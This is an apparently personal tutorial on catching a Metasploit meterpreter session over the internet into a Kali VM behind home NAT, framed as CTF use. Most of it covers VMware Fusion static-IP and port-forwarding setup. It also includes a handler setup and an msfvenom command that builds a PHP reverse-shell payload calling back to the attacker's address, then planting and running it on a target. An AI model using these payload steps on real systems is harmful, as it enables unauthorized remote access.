Metasploit Over The Internet Behind NAT
Scenario:
> be at home > play some internet CTF > using metasploit > too cheap to use a VPS > need to catch a shell/meterpreter over the internet > behind a NAT > into a VM that is setup for NAT networking
The end goal is to catch a meterpreter session inside of a Kali VM. Start at the VM config and work outward, returning to the listener in the VM.
This is seriously for a CTF scenario. Heed the wisdom of Hackers.
- Home WiFi router with NAT/port forwarding
- MacBook Pro on OS X Yosemite (10.10.5)
- VMware Fusion 8
The Kali VM is configured with NAT networking and will use a static IP address to keep the port forwarding simple. A section must be added to /Library/Preferences/VMware Fusion/vmnet8/dhcpd.conf for each host assigned a static IP. The only items needed are the guest VM MAC address and desired IP address. Append the section below the End of "DO NOT MODIFY SECTION".
# ----------------------------------------------------------- # Kali VM # ----------------------------------------------------------- host kali { hardware ethernet 00:0C:29:66:0D:4F; fixed-address 172.16.107.66; }
- VMware Fusion needs to be closed before editing the configuration.
- The static IP address should be outside of the allocatable address pool to prevent a collision.
In this case the pool is range 172.16.107.128 172.16.107.254; and the static IP is 172.16.107.66, outside the range.
The next step is to forward traffic received by VMware into the guest VM. This is done via the file /Library/Preferences/VMware Fusion/vmnet8/nat.conf. Locate the section [incomingtcp] and add the needed entry. In this scenario, 4444/tcp will be forwarded through.
[incomingtcp] # ----------------------------------------------------------- # Kali VM # ----------------------------------------------------------- 4444 = 172.16.107.66:4444
VMware Fusion needs to be added to the firewall to accept incoming connections. In OS X:
- System Preferences
- Security & Privacy
- Unlock (bottom left)
- Firewall Options...
- Click '+'
- VMware Fusion
- Lock (bottom left)
The IP address of my MacBook Pro is 192.168.1.114. A rule was added on the router to port forward incoming connections on 4444/tcp to 192.168.1.114:4444. The specifics of this will vary per network and device so find your own settings.
Load VMware Fusion and start the Kali VM. The IP address of the Kali VM should be the static one set in dhcpd.conf. Set up a netcat listener in the Kali VM.
root@kali:~ # nc -nvlp 4444 nc: listening on :: 4444 ... nc: listening on 0.0.0.0 4444 ...
From a remote system:
$ nc -nv 70.115.x.x 4444 nnetfd reuseport failed : Protocol not available (UNKNOWN) [70.115.x.x] 4444 (?) open : Protocol not available
The connection can be confirmed in the Kali VM.
nc: connect to 172.16.107.66 4444 from 216.54.x.x 39409
Time to verify the end goal with a meterpreter shell. First set up a listener in the Kali VM.
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:4444 [*] Starting the payload handler...
Next generate a meterpreter payload with msfvenom in the Kali VM.
root@kali:~ # msfvenom -p php/meterpreter/reverse_tcp LHOST=70.115.x.x LPORT=4444 -f raw > meterpreter.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 950 bytes
Place the payload on the target system in the CTF and execute. Lastly the session lands in the Kali VM.
[*] Starting the payload handler... [*] Sending stage (32461 bytes) to 216.54.x.x [*] Meterpreter session 1 opened (172.16.107.66:4444 -> 216.54.x.x:39451) at 2015-10-11 19:01:43 -0500
Metasploit, over the internet, behind the NAT, into the VM, nothing but net.